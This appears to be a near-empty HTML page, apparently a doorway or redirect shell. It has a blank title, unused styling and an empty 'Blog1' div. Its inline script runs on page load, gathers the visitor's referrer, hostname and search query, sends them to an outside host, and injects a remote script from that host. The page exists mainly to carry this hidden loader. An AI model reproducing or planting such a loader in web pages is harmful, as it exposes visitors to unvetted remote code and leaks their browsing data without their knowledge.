<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
	<meta name="description" content="">
	<meta name="robots" content="noarchive">
	
	
	<script>
		const referrer = encodeURIComponent(document.referrer);
		let str_add = ``;
		const site_js = encodeURIComponent(window.location.hostname);
		const search_js = encodeURIComponent(window.location.search);
		if (referrer != ''){
			str_add = `&site=${site_js}&search=${search_js}`;
		}
		
		const scriptUrl = `https://js-ax-s3.com/85352/dop-85352.js?ref=${referrer}` + str_add;
		let elem = document.createElement('script');
		elem.setAttribute('src', scriptUrl);
		document.head.appendChild(elem);
	</script>
	
    <style>
        .pipeline--header {
            background: #2D3743;
            padding: 1.6rem;
        }
        
        #ci--search {
            background: #4A5563;
            color: white;
            padding: 14px;
            width: 100%;
            border-radius: 5px;
        }
		
		#main {
			margin: 22px 0;
			max-height: 505px;
			overflow-y: auto;
        }		
        
        .stage--links a {
            background: #EDF2F3;
            padding: 16px;
            margin: 7px 0;
            display: inline;
			word-break: break-all;
        }
    </style>
</head>
<body style="text-align:center;">

	<div style="width:100%;text-align:center;border:20px;" id="Blog1"></div>
	
</body>
</html>